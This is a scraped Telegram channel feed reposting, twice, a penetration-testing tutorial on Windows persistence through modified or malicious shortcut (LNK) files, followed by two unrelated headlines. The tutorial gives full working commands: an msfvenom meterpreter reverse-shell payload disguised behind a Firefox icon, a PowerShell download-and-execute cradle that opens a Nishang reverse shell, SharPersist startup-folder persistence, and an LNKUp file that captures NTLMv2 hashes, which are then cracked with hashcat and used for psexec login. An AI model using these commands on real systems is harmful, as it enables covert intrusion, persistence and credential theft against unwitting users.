Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Windows Persistence: Shortcut Modification (T1547)

IntroductionAccording to MITRE, “Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.”<o:p

Shortcut modification is a technique in which an attacker can replace the absolute path of an executable bound to be run by a shortcut and masquerade it as a legitimate looking icon which can be run on startup thus achieving persistence. In this article, we will look at two such easy techniques that can help a user gain persistence using this technique.<o:p

MITRE TACTIC: Privilege Escalation (TA0004) and Persistence (TA0003)<o:p MITRE TECHNIQUE ID: T1547 (Boot or Logon Autostart Execution)<o:pSUBTITLE: PE Injection (T1547.009)<o:p<o:pTable of content<o:p· Background<o:p· PERS1 - Manual shortcut modification + reverse shell<o:p· PERS2 - Manual shortcut modification + Powershell One Liner<o:p· PERS3 - Shortcut modification using SharPersist.exe<o:p· PERS4 - Shortcut creation and NTLM hash compromise<o:p· Conclusion<o:p<o:p Background<o:pA window’s shortcut file ends with *.LNK extension and contains the absolute path of an executable which could be run using this shortcut. Shortcuts have been used for attacks by adversaries since the time 50 cents was at peak and so was unawareness about cyber security. One such example includes malware propagation by CDs and DVDs used in public internet cafes which often contained malicious shortcuts. In modern windows systems, LNK files are able to run a plethora of files including exe, cmd, vbs, powershell etc. Now, an attacker can create a new shortcut with powershell script embedded or can modify an existing shortcut for stealthier attacks. In this article, we talk about such approaches.<o:p

<o:p PERS1 - Manual Shortcut Modification + reverse shell<o:pTo start with the exploitation, we first need to set up the payload we would run upon system startup. I created a meterpreter payload using msfvenom.<o:p msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.78.142 lport=1234 -f exe > shell.exe<o:phttps://blogger.googleusercontent.com/img/a/AVvXsEjDLFUugGxrs6qpSZD8kDNx8FJzDOnDgjpVPTXngnhIUt4arKsRydz3cHqWMtc1CYZi2HJ1teDUiiXvnshMdf_B-XNv3n-T_0oWitbNsCk_iJLts3I3BkpJC_Ogt0fHqkcmnl9Ha8YmndzZCMwtQxDnWStEPEGy_9N8oKv5m1gWcsKxmF-J6-uDr5JXBw=s16000 Now that it is ready, we can move on with persistence method 1. Here, we are assuming that we have compromised the system and already have RDP to the server or any other protocol that lets us view the GUI of victim. On the victim’s desktop, we found a firefox shortcut.<o:p https://blogger.googleusercontent.com/img/a/AVvXsEgsQk_A1P2s3cOKlQT5_gxIqiX72sOLZvuPnc9FHwQpQXaz69Y2D96-b3CE7p5FHU01HwWdACl3KY3hj4-oRDLSntpfjEsmNqXCOwc5nt3rPjhR9eIOEOImOxHtolJJyrxtJ0GJ7ke8Y0Eocy8p6-_ehV8PrnIwWwBiu7JolRYxxte4w-AFycnqIaCyHg=s16000 As you can see, target field in the shortcut is set to run firefox executable. We simply need to switch it with a command of our own. In this case, I’ll be running my reverse shell by supplying in the path of the shell.exe file. Plus, we’ll start this in minimized mode so that it’s a bit more stealthy.<o:p https://blogger.googleusercontent.com/img/a/AVvXsEiJk1q1El-hVE-lBxI0PpnAftYfBD25Sd_Yn7p_DfrhSMC5CsFVYYJbQn7C4Stp0m7IkMk-S8OrdR6S_g5_FvhfAvP-_Qq5Ir_afyG9K-PiFDVrduidOgPxot7JSbb1mIBWhJqTuKFV2keyIEEIY_coB1pkBfpbGPPml7Hw2De9voxSEdYG3iD2QA4N0w=s16000 But as you may have noticed, the icon has been changed. To re[...]
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Windows Persistence: Shortcut Modification (T1547) IntroductionAccording to MITRE, “Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain…
place it back to the desired firefox one, we will click change icon and point it to the firefox.exe binary.<o:p https://blogger.googleusercontent.com/img/a/AVvXsEiZgISXTciUqR1TFcmuvVvc4mHQlQCQyoEtocZXP8-Ih4rP0Cy5njb_rxxBgJE9pP82JQ6ILMW91SWNPat82L2xvzqJQvR1TFrM-u9-XAUfF-nSH9RJmLkpz5UIydiTFNC13tBHRzvJ7UpQqnCAj-Zq_Y3hRHzNL4pPVWkgqcQQp5g6AoeYV8IsCc8rbQ=s16000 All must be set and done now and the icon been replaced to firefox one.<o:p https://blogger.googleusercontent.com/img/a/AVvXsEi8sJLNJkwlQh9yrE4tbb_pAg_G3ovd3wNSN-AsEYJnThv4HmSnFEQKmJ-nmqol4P2919lEWP6NTazDnL0bOZlM_dlzomRghzFoIBVHXG8WGMBP_5ZesBsDXuVrdELCe6iIhX5cZBUg3H1AUAlKAOWm2IUmtRfz8zvx2q3TT7qabwDKaTNwPP9TNawmaA=s16000 Now, we need to place this shortcut in the startup folder so that it gets executed every time a system restarts.<o:p %appdata%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup<o:phttps://blogger.googleusercontent.com/img/a/AVvXsEgbqhT0SNvirc2YTGjED22R7YLoITks7VFo58hYK-V9iMooMPUygAXG_gW16L4Um3SSrIpAo1XfAuncrPja1aVq0PvNQ6rCs8SeqMLBBQeY83Lyae603_o1eT-cTNXsUTQ9K-iq2neKqaC-33LalGxUMYqUXGmUx8YTL5D6ERwp34TevOFzEwwa_7RnjQ=s16000 Note: Make sure to put shell.exe in the \users\public folder for this to run. Upon restarting the system, our handler has successfully received a reverse shell.<o:p https://blogger.googleusercontent.com/img/a/AVvXsEgodf44bPa2BrqMKzmiCmRwE6x2HWKVyjF8IKjXT36jB6DJHIkxnIjmU_y1FFsxoScd3o4DfS5poNJ-gw5t1isHJOFnGmLbxJ2uSfhJ1iAoDeEipUjgOteYgQ6dbAEj4Au4VYYeKJQgi1u7ZGcFnEOe0QgEQGV42GN5dqMCj0EO70SRWpO4-24xVC5FHQ=s16000 <o:p PERS2 - Manual shortcut modification + Powershell One Liner<o:pWhile the method stated above stands effective, it needs a user to manually deploy a payload into the victim’s machine. The next method is a little more subtle. We will be deploying a powershell one liner in the shortcut file. You can read our article here about more such tactics. Now, we will be using Nishang for the purpose. In the target path section you need to supply this command as input:<o:p powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.78.142/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.78.142 -Port 4444<o:pYou need to change your IP and port as per your environment.<o:p https://blogger.googleusercontent.com/img/a/AVvXsEjmn6_z0CMI4UqvZFFPZriWyMXD7e-tFN9EVQOvmn3Nrh9ZjQ0UO_yZkq__7YyOfDRNMMSrT-gAed2SggDdHm_pwf0eJyQyDIaK_eHPqXFbWS9e4HnwDBJlrserqcMDMPd4ea-pyr5Uv8R_lT9pxSu27ZEN7IAnAJawZKb9TXeGP1pn8ZWsEcjeOYL3vw=s16000 Now, you need to download the Invoke-PowerShellTcp.ps1 script and run local python server on port 80.<o:p wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1python3 -m http.server 80<o:phttps://blogger.googleusercontent.com/img/a/AVvXsEj240uG82sXG9HnmNew38Ssaxyw2Q-OsJ8nBfoiNoFHj-USUSY1XdgpGlyPLfTPxvl-rhGITwkbcLQvzhBM1pW0yPNRO85xE_ABzigCymrdS-DBpcOCOzGs527LryIRiXGvqUCekMHwc-tjdrpC-k_OAWDzcV0oeTrzLlzG4wS-Y0HtfTlwmXj1KhWjlg=s16000 Now, once the shortcut is put in the startup folder and the system restarted, we should receive a reverse shell on our netcat listener!<o:p https://blogger.googleusercontent.com/img/a/AVvXsEiDeK1xqda0qwXFFSga3qpqCdScXGgweB8Hu2yHgC28DrsqTVSJA4NjeOQKMaLDuFomWu0tWn2zhO8EHMQqYwm___daCIqqvVMHN8sICEyBWds6l1aYkQ4TYeLQaia4zVZHhvv9W30SAvzKGPqUXtNuOpHtVFd6u-3rOzvZl47d3-n4e4KFcNFcB__Scw=s16000 <o:p PERS3 - Shortcut modification using SharPersist.exe<o:pThe next method we are going to demonstrate can be done locally from the client’s terminal (CLI reverse shell). We will be using a C# implementation of the method displayed earlier called “SharPersist.” To download this you can run the following command:<o:p wget https://github.com/mandiant/SharPersist/releases/download/v1.0.1/SharPersist.exe <o:phttps://blogger.googleusercontent.com/img/a/AVvXsEiaQzpMZGi8XMTk51__C6Bu3z5eAAIOfM8Y6kVHNwXgTIIchKSz32H5zgelJQFqdwZUkGN8O4jR[...]
Hacking Articles Tips Tricks Videos Tutorials
place it back to the desired firefox one, we will click change icon and point it to the firefox.exe binary.<o:p https://blogger.googleusercontent.com/img/a/AVvXsEiZgISXTciUqR1TFcmuvVvc4mHQlQCQyoEtocZXP8-Ih4rP0Cy5njb_rxxBgJE9pP82JQ6ILMW91SWNPat82L2xvzqJQvR1TFrM…
mNiLj1YPEQokvkmVtCSL3Y5JiKDQS_AR7XO2BFyAcu6ff1Nn-1gUXJQw6YyVwNrh4nCYrb-_q360CyoxUzvjln9oQ2Ddnxh5r4bkcT_vH-gb5t2QLw=s16000 Upon initial compromise of the victim, we need to upload this executable on the victim’s system along with the msfvenom meterpreter payload we made. Now, to create a shortcut using SharPersist you can run the tool with the following flags:<o:p

t=> target folder<o:p

c=> command to run upon execution<o:p

f=> name of the file<o:p powershell wget 192.168.78.142/SharPersist.exe -O SharPersist.exe<o:ppowershell wget 192.168.78.142/shell.exe -O shell.exe<o:pSharPersist.exe -t startupfolder -c "cmd.exe" -a "/c C:\Users\Public\shell.exe" -f "ignite" -m add<o:phttps://blogger.googleusercontent.com/img/a/AVvXsEgrofiYZBAnyw-nXMEdcG5T1gTcUyD-s8wat-lWhBOEXM8STyOpe_ZvOfAODgBH3YqQafnJGntOFfTibTzeBvwutpciPl82q43cU4l8HBWubUQkvz6H2rN5Jh6VMCDUa3d7BBccTKMp42U37ZyrapodfDLjXXioEyVvD_mrGJUkljGxbkkS-qS7Fgw_sg=s16000 As you might observe, the shortcut ignite.lnk has been placed in the startup folder. Upon restarting the system, we received a meterpreter shell!<o:p https://blogger.googleusercontent.com/img/a/AVvXsEjDMWz3JnuL08375So46njjf69LOY2TFixGUk7N5yug4nOlkYvjxYkxmlPO74OvHQ4j32RKW6-o5BE0_85DDwY9k1NIq9fOghn9R9upqyWzwcK4Jlf0AEl1mO6aXlgbXh8b9GqKL2HTd2TsA4m09pDpu1JnIkzPLjA6nhr1eD1SCVnrYn-aCwwgQfi96g=s16000 <o:p PERS4 - Shortcut creation and NTLM hash compromise<o:pThe last method is the most subtle and least traceable method of all. Here, we are using a python script called LNKUp to create an LNK file and make the victim authenticate towards our system and in turn we get a hold of his NTLM credentials. This can be done using SharPersist too by adding the cmd authenticator command or by calling SMB share set up in kali (Impacket’s smbserver for example) by using UNC path. To download and run the file, you need python2.7 and pip2.7 installed. After that you can generate the LNK payload like following:<o:p apt install python2.7<o:pcd /usr/lib/python2.7<o:pwget https://bootstrap.pypa.io/pip/2.7/get-pip.py<o:ppython2.7 get-pip.py<o:pgit clone https://github.com/plazmaz/lnkup.git<o:pcd lnkup<o:ppython2.7 generate.py --host 192.168.78.133 --type ntlm --output readme.lnk<o:p<o:phttps://blogger.googleusercontent.com/img/a/AVvXsEhEeIRc9fVJSRu5YxqgrfnQ0s-Wsn4FO-H83UfOKj-5G2yDi1ZaPBYDNSPDbWAuSN3VTC1nVUi5WTl8cVAIhIbSUvY48fB8MIFX8fVwFew0oTfALf0JF3RaJyjLSa-4iMb2AIAFR8byZq00UIwVw688a0dwp-MoSgGkxxQrDfk1xEoV3bDMP_BH6wI9lA=s16000 Now, we can upload this file to the startup folder manually using the compromised client’s terminal.<o:p cd C:\Users\hex\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
powershell wget
192.168.78.133/readme.lnk -O readme.lnk<o:p https://blogger.googleusercontent.com/img/a/AVvXsEguvW6fySKogH-ZEeo9e5VK_C8gXrCnPHFpDy8EfFXoH-zAdUSDH_UPeB-ZXECIES1w9iZcrjOp_XhVaXWT_N6i0lnBVglbq2e6AwhImyEsKb8SUyei8V72Ruvr0xfGLaj277aPZlaf38-WFz8enRb4eDgG-Y5DRdYQ2YO2r40GYpHUtoOvxPgUZNqoXA=s16000 Now, we need to set up a responder on current interface. This is important as the authentication will be called back to our setup and responder will catch it.<o:p https://blogger.googleusercontent.com/img/a/AVvXsEiStrHIUt18VtL7-lJvfTy8Rrc6eF9oJwP9h6N6wn5xAGOuPlNtvwAAtwUGxQAvGtA1yUpqHaPs3yzQd3V5Y5NX_zyGquxx2fy_BTNg8QQxK8INqTxKybPJ8N_j528qMYMQV5RIHer5Yu4-nVKOJ5LZiMFUd6u9dtoK9mM1efABe8Cxv1-zN3larXThqA=s16000 Now, we wait for the system to restart. As soon as it restarts, you can see that we have obtained the NTLMv2 hashes<o:p https://blogger.googleusercontent.com/img/a/AVvXsEizQIm8z2hl42sETDN1TCWUw7Kl0V7PLRQbNCI0VY81uVMXBD97EPfkCr6WhHISepvdHzi_MECF_cG8wfuwMDk2DfrFschiNus9qhKdARdNFezyLC8edx_s40zrSnI2IyPEFnhG8ZyLH3IssO84KgboGr5t6alRvWba1Lm2JrPh7a0hj9J6ZvBG3mi_hA=s16000 We can copy this into a file called “hash” and use hashcat to crack them. The mo[...]
Hacking Articles Tips Tricks Videos Tutorials
mNiLj1YPEQokvkmVtCSL3Y5JiKDQS_AR7XO2BFyAcu6ff1Nn-1gUXJQw6YyVwNrh4nCYrb-_q360CyoxUzvjln9oQ2Ddnxh5r4bkcT_vH-gb5t2QLw=s16000 Upon initial compromise of the victim, we need to upload this executable on the victim’s system along with the msfvenom meterpreter payload…
dule code for NTLMv2 is 5600.<o:p hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force<o:phttps://blogger.googleusercontent.com/img/a/AVvXsEgBZuwFkDt5H1Nies80cLx_TL9GJz8nICVGZuviVjCu9_FcYPyCceLIPxSwNBoBjVRZ3DYU45jzhcpN2_IFwczCF4fU9yQfUJ3H7CleUMjOCBDPHJx1MosUtr4O65cxtfDgIzm33NVzCtLVoaAJ1takWNaguwyDXEQtEU2A5yPSeKrDoSvzrpBQdutflw=s16000 As you can see above, the hash has been cracked and clear text password given as “123.” We can now use these credentials with psexec and log onto the system.<o:p python3 psexec.py hex:123@192.168.78.141
whoami<o:phttps://blogger.googleusercontent.com/img/a/AVvXsEiw7Y-lChFGJWdQ3QYjxkEtAOzsI4w3Kwx54dr4R7ZDMhUfIJ0vO0iKHACw9icvKtoyIyTsK7xIVeQ-I9hhjNIoSJz56VnuFU8KTHnylFjyZs62bHuwNFJzfPXu7wTHieZVjytsN7Mivh1ILA3wuvCaiYcB-FHGaCDKlNooUc1c6Vn64yoMfx5Nh92T1w=s16000 <o:pConclusion

Only a few attacks in cyber security have tested time and malicious shortcut is among one of them. There is no real fix for this technique from the vendors because it relies on the gullibility of the victim for this to work much like phishing. We hope you enjoyed the article. Thanks for reading.<o:p
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
Windows Persistence: Shortcut Modification (T1547)

IntroductionAccording to MITRE, “Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.”

Shortcut modification is a technique in which an attacker can replace the absolute path of an executable bound to be run by a shortcut and masquerade it as a legitimate looking icon which can be run on startup thus achieving persistence. In this article, we will look at two such easy techniques that can help a user gain persistence using this technique.

MITRE TACTIC: Privilege Escalation (TA0004) and Persistence (TA0003)

MITRE TECHNIQUE ID: T1547 (Boot or Logon Autostart Execution)

SUBTITLE: PE Injection (T1547.009) Table of content* Background
* PERS1 – Manual shortcut modification + reverse shell
* PERS2 – Manual shortcut modification + Powershell One Liner
* PERS3 – Shortcut modification using SharPersist.exe
* PERS4 – Shortcut creation and NTLM hash compromise
* Conclusion BackgroundA window’s shortcut file ends with *.LNK extension and contains the absolute path of an executable which could be run using this shortcut. Shortcuts have been used for attacks by adversaries since the time 50 cents was at peak and so was unawareness about cyber security. One such example includes malware propagation by CDs and DVDs used in public internet cafes which often contained malicious shortcuts. In modern windows systems, LNK files are able to run a plethora of files including exe, cmd, vbs, powershell etc. Now, an attacker can create a new shortcut with powershell script embedded or can modify an existing shortcut for stealthier attacks. In this article, we talk about such approaches. PERS1 – Manual Shortcut Modification + reverse shellTo start with the exploitation, we first need to set up the payload we would run upon system startup. I created a meterpreter payload using msfvenom.
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.78.142 lport=1234 -f exe > shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEjDLFUugGxrs6qpSZD8kDNx8FJzDOnDgjpVPTXngnhIUt4arKsRydz3cHqWMtc1CYZi2HJ1teDUiiXvnshMdf_B-XNv3n-T_0oWitbNsCk_iJLts3I3BkpJC_Ogt0fHqkcmnl9Ha8YmndzZCMwtQxDnWStEPEGy_9N8oKv5m1gWcsKxmF-J6-uDr5JXBw=s16000

Now that it is ready, we can move on with persistence method 1. Here, we are assuming that we have compromised the system and already have RDP to the server or any other protocol that lets us view the GUI of victim. On the victim’s desktop, we found a firefox shortcut.

https://blogger.googleusercontent.com/img/a/AVvXsEgsQk_A1P2s3cOKlQT5_gxIqiX72sOLZvuPnc9FHwQpQXaz69Y2D96-b3CE7p5FHU01HwWdACl3KY3hj4-oRDLSntpfjEsmNqXCOwc5nt3rPjhR9eIOEOImOxHtolJJyrxtJ0GJ7ke8Y0Eocy8p6-_ehV8PrnIwWwBiu7JolRYxxte4w-AFycnqIaCyHg=s16000

As you can see, the target field in the shortcut is set to run the firefox executable. We simply need to switch it with a command of our own. In this case, I’ll be running my reverse shell by supplying in the path of the shell.exe file. Plus, we’ll start this in the minimized mode so that it’s a bit more stealthy.

https://blogger.googleusercontent.com/img/a/AVvXsEiJk1q1El-hVE-lBxI0PpnAftYfBD25Sd_Yn7p_DfrhSMC5CsFVYYJbQn7C4Stp0m7IkMk-S8OrdR6S_g5_FvhfAvP-_Qq5Ir_afyG9K-PiFDVrduidOgPxot7JSbb1mIBWhJqTuKFV2keyIEEIY_coB1pkBfpbGPPml7Hw2De9voxSEdYG3iD2QA4N0w=s16000

But as you may have noticed, the icon has been changed. To replace it back to the desired firefox one, we will click the change icon and point it to the firefox.exe binary.

https://blogger.googleusercontent.com/img/a/AVvXsEiZgISXTciUqR1TFcmuvVvc4mHQlQCQyoEtocZXP8-Ih4rP0Cy5njb_rxxBgJE9pP82JQ6ILMW[...]
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles Windows Persistence: Shortcut Modification (T1547) IntroductionAccording to MITRE, “Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges…
91SWNPat82L2xvzqJQvR1TFrM-u9-XAUfF-nSH9RJmLkpz5UIydiTFNC13tBHRzvJ7UpQqnCAj-Zq_Y3hRHzNL4pPVWkgqcQQp5g6AoeYV8IsCc8rbQ=s16000

All must be set and done now and the icon has been replaced with firefox one.

https://blogger.googleusercontent.com/img/a/AVvXsEi8sJLNJkwlQh9yrE4tbb_pAg_G3ovd3wNSN-AsEYJnThv4HmSnFEQKmJ-nmqol4P2919lEWP6NTazDnL0bOZlM_dlzomRghzFoIBVHXG8WGMBP_5ZesBsDXuVrdELCe6iIhX5cZBUg3H1AUAlKAOWm2IUmtRfz8zvx2q3TT7qabwDKaTNwPP9TNawmaA=s16000

Now, we need to place this shortcut in the startup folder so that it gets executed every time a system restarts.
%appdata%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
https://blogger.googleusercontent.com/img/a/AVvXsEgbqhT0SNvirc2YTGjED22R7YLoITks7VFo58hYK-V9iMooMPUygAXG_gW16L4Um3SSrIpAo1XfAuncrPja1aVq0PvNQ6rCs8SeqMLBBQeY83Lyae603_o1eT-cTNXsUTQ9K-iq2neKqaC-33LalGxUMYqUXGmUx8YTL5D6ERwp34TevOFzEwwa_7RnjQ=s16000

Note: Make sure to put shell.exe in the \users\public folder for this to run. Upon restarting the system, our handler has successfully received a reverse shell.

https://blogger.googleusercontent.com/img/a/AVvXsEgodf44bPa2BrqMKzmiCmRwE6x2HWKVyjF8IKjXT36jB6DJHIkxnIjmU_y1FFsxoScd3o4DfS5poNJ-gw5t1isHJOFnGmLbxJ2uSfhJ1iAoDeEipUjgOteYgQ6dbAEj4Au4VYYeKJQgi1u7ZGcFnEOe0QgEQGV42GN5dqMCj0EO70SRWpO4-24xVC5FHQ=s16000 PERS2 – Manual shortcut modification + Powershell One LinerWhile the method stated above stands effective, it needs a user to manually deploy a payload into the victim’s machine. The next method is a little more subtle. We will be deploying a powershell one-liner in the shortcut file. You can read our article here about more such tactics. Now, we will be using Nishang for this purpose. In the target path section you need to supply this command as input:
powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.78.142/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.78.142 -Port 4444
https://blogger.googleusercontent.com/img/a/AVvXsEjmn6_z0CMI4UqvZFFPZriWyMXD7e-tFN9EVQOvmn3Nrh9ZjQ0UO_yZkq__7YyOfDRNMMSrT-gAed2SggDdHm_pwf0eJyQyDIaK_eHPqXFbWS9e4HnwDBJlrserqcMDMPd4ea-pyr5Uv8R_lT9pxSu27ZEN7IAnAJawZKb9TXeGP1pn8ZWsEcjeOYL3vw=s16000

You need to change your IP and port as per your environment.

Now, you need to download the Invoke-PowerShellTcp.ps1 script and run the local python server on port 80.
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
python3 -m http.server 80
https://blogger.googleusercontent.com/img/a/AVvXsEj240uG82sXG9HnmNew38Ssaxyw2Q-OsJ8nBfoiNoFHj-USUSY1XdgpGlyPLfTPxvl-rhGITwkbcLQvzhBM1pW0yPNRO85xE_ABzigCymrdS-DBpcOCOzGs527LryIRiXGvqUCekMHwc-tjdrpC-k_OAWDzcV0oeTrzLlzG4wS-Y0HtfTlwmXj1KhWjlg=s16000

Now, once the shortcut is put in the startup folder and the system restarted, we should receive a reverse shell on our netcat listener!

https://blogger.googleusercontent.com/img/a/AVvXsEiDeK1xqda0qwXFFSga3qpqCdScXGgweB8Hu2yHgC28DrsqTVSJA4NjeOQKMaLDuFomWu0tWn2zhO8EHMQqYwm___daCIqqvVMHN8sICEyBWds6l1aYkQ4TYeLQaia4zVZHhvv9W30SAvzKGPqUXtNuOpHtVFd6u-3rOzvZl47d3-n4e4KFcNFcB__Scw=s16000 PERS3 – Shortcut modification using SharPersist.exeThe next method we are going to demonstrate can be done locally from the client’s terminal (CLI reverse shell). We will be using a C# implementation of the method displayed earlier called “SharPersist.” To download this you can run the following command:
wget https://github.com/mandiant/SharPersist/releases/download/v1.0.1/SharPersist.exe
https://blogger.googleusercontent.com/img/a/AVvXsEiaQzpMZGi8XMTk51__C6Bu3z5eAAIOfM8Y6kVHNwXgTIIchKSz32H5zgelJQFqdwZUkGN8O4jRmNiLj1YPEQokvkmVtCSL3Y5JiKDQS_AR7XO2BFyAcu6ff1Nn-1gUXJQw6YyVwNrh4nCYrb-_q360CyoxUzvjln9oQ2Ddnxh5r4bkcT_vH-gb5t2QLw=s16000

Upon initial compromise of the victim, we need to upload this executable on the victim’s system along with the msfvenom meterpreter payload we made. Now, to create a shortcut using SharPersist you can run the tool w[...]
Hacking Articles Tips Tricks Videos Tutorials
91SWNPat82L2xvzqJQvR1TFrM-u9-XAUfF-nSH9RJmLkpz5UIydiTFNC13tBHRzvJ7UpQqnCAj-Zq_Y3hRHzNL4pPVWkgqcQQp5g6AoeYV8IsCc8rbQ=s16000 All must be set and done now and the icon has been replaced with firefox one. https://blogger.googleusercontent.com/img/a/AVvXsEi…
ith the following flags:

t=> target folder

c=> command to run upon execution

f=> name of the file
powershell wget 192.168.78.142/SharPersist.exe -O SharPersist.exe
powershell wget 192.168.78.142/shell.exe -O shell.exe
SharPersist.exe -t startupfolder -c "cmd.exe" -a "/c C:\Users\Public\shell.exe" -f "ignite" -m add
https://blogger.googleusercontent.com/img/a/AVvXsEgrofiYZBAnyw-nXMEdcG5T1gTcUyD-s8wat-lWhBOEXM8STyOpe_ZvOfAODgBH3YqQafnJGntOFfTibTzeBvwutpciPl82q43cU4l8HBWubUQkvz6H2rN5Jh6VMCDUa3d7BBccTKMp42U37ZyrapodfDLjXXioEyVvD_mrGJUkljGxbkkS-qS7Fgw_sg=s16000

As you might observe, the shortcut ignite.lnk has been placed in the startup folder. Upon restarting the system, we received a meterpreter shell!

https://blogger.googleusercontent.com/img/a/AVvXsEjDMWz3JnuL08375So46njjf69LOY2TFixGUk7N5yug4nOlkYvjxYkxmlPO74OvHQ4j32RKW6-o5BE0_85DDwY9k1NIq9fOghn9R9upqyWzwcK4Jlf0AEl1mO6aXlgbXh8b9GqKL2HTd2TsA4m09pDpu1JnIkzPLjA6nhr1eD1SCVnrYn-aCwwgQfi96g=s16000 PERS4 – Shortcut creation and NTLM hash compromiseThe last method is the most subtle and least traceable method of all. Here, we are using a python script called LNKUp to create an LNK file and make the victim authenticate towards our system and in turn, we get a hold of his NTLM credentials. This can be done using SharPersist too by adding the cmd authenticator command or by calling SMB share set up in kali (Impacket’s smbserver for example) by using UNC path. To download and run the file, you need python2.7 and pip2.7 installed. After that you can generate the LNK payload like following:
apt install python2.7
cd /usr/lib/python2.7
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2.7 get-pip.py
git clone https://github.com/plazmaz/lnkup.git
cd lnkup
python2.7 generate.py --host 192.168.78.133 --type ntlm --output readme.lnk
https://blogger.googleusercontent.com/img/a/AVvXsEhEeIRc9fVJSRu5YxqgrfnQ0s-Wsn4FO-H83UfOKj-5G2yDi1ZaPBYDNSPDbWAuSN3VTC1nVUi5WTl8cVAIhIbSUvY48fB8MIFX8fVwFew0oTfALf0JF3RaJyjLSa-4iMb2AIAFR8byZq00UIwVw688a0dwp-MoSgGkxxQrDfk1xEoV3bDMP_BH6wI9lA=s16000

Now, we can upload this file to the startup folder manually using the compromised client’s terminal.
cd C:\Users\hex\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
powershell wget 192.168.78.133/readme.lnk -O readme.lnk
https://blogger.googleusercontent.com/img/a/AVvXsEguvW6fySKogH-ZEeo9e5VK_C8gXrCnPHFpDy8EfFXoH-zAdUSDH_UPeB-ZXECIES1w9iZcrjOp_XhVaXWT_N6i0lnBVglbq2e6AwhImyEsKb8SUyei8V72Ruvr0xfGLaj277aPZlaf38-WFz8enRb4eDgG-Y5DRdYQ2YO2r40GYpHUtoOvxPgUZNqoXA=s16000

Now, we need to set up a responder on the current interface. This is important as the authentication will be called back to our setup and the responder will catch it.

https://blogger.googleusercontent.com/img/a/AVvXsEiStrHIUt18VtL7-lJvfTy8Rrc6eF9oJwP9h6N6wn5xAGOuPlNtvwAAtwUGxQAvGtA1yUpqHaPs3yzQd3V5Y5NX_zyGquxx2fy_BTNg8QQxK8INqTxKybPJ8N_j528qMYMQV5RIHer5Yu4-nVKOJ5LZiMFUd6u9dtoK9mM1efABe8Cxv1-zN3larXThqA=s16000

Now, we wait for the system to restart. As soon as it restarts, you can see that we have obtained the NTLMv2 hashes

https://blogger.googleusercontent.com/img/a/AVvXsEizQIm8z2hl42sETDN1TCWUw7Kl0V7PLRQbNCI0VY81uVMXBD97EPfkCr6WhHISepvdHzi_MECF_cG8wfuwMDk2DfrFschiNus9qhKdARdNFezyLC8edx_s40zrSnI2IyPEFnhG8ZyLH3IssO84KgboGr5t6alRvWba1Lm2JrPh7a0hj9J6ZvBG3mi_hA=s16000

We can copy this into a file called “hash” and use hashcat to crack them. The module code for NTLMv2 is 5600.
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
https://blogger.googleusercontent.com/img/a/AVvXsEgBZuwFkDt5H1Nies80cLx_TL9GJz8nICVGZuviVjCu9_FcYPyCceLIPxSwNBoBjVRZ3DYU45jzhcpN2_IFwczCF4fU9yQfUJ3H7CleUMjOCBDPHJx1MosUtr4O65cxtfDgIzm33NVzCtLVoaAJ1takWNaguwyDXEQtEU2A5yPSeKrDoSvzrpBQdutflw=s16000

As you can see above, the hash has been cracked and clear text password given as “123.” We can now use these credentials with psexec and log onto the system.
python3 psexec.py hex:123@192.168.78.141
[...]
Hacking Articles Tips Tricks Videos Tutorials
ith the following flags: t=> target folder c=> command to run upon execution f=> name of the file powershell wget 192.168.78.142/SharPersist.exe -O SharPersist.exe powershell wget 192.168.78.142/shell.exe -O shell.exe SharPersist.exe -t startupfolder -c…
whoami
https://blogger.googleusercontent.com/img/a/AVvXsEiw7Y-lChFGJWdQ3QYjxkEtAOzsI4w3Kwx54dr4R7ZDMhUfIJ0vO0iKHACw9icvKtoyIyTsK7xIVeQ-I9hhjNIoSJz56VnuFU8KTHnylFjyZs62bHuwNFJzfPXu7wTHieZVjytsN7Mivh1ILA3wuvCaiYcB-FHGaCDKlNooUc1c6Vn64yoMfx5Nh92T1w=s16000 ConclusionOnly a few attacks in cyber security have tested time and malicious shortcut is among one of them. There is no real fix for this technique from the vendors because it relies on the gullibility of the victim for this to work much like phishing. We hope you enjoyed the article. Thanks for reading.

Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here

The post Windows Persistence: Shortcut Modification (T1547) appeared first on Hacking Articles.
No Rate Limiting on Forget Password Page (Email Triggering)

Vulnerability Category: A6- Security MisconfigurationContinue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Cyber-attack on Nvidia linked to Lapsus$ ransomware gang

